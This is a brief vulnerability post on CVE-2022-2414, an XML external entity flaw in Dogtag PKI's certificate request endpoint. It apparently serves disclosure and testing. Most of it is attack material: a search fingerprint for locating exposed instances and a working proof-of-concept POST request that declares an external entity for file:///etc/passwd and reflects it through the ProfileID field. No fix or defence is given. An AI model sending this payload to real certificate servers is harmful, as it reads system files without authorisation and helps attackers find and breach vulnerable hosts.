Dogtag PKI XML entity injection vulnerability CVE-2022-2414
Vulnerability Description
Dogtag PKI’s XML parser resolves external entities while parsing an XML document, which makes it vulnerable to XML external entity (XXE) attacks.
Vulnerability Impact
Dogtag PKI
Network surveying and mapping
title="Identity Management"
Vulnerability Reproduction
Login page
Verification PoC
POST /ca/rest/certrequests
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&ent;</ProfileID>
</CertEnrollmentRequest>
This post is licensed under CC BY 4.0 by the author.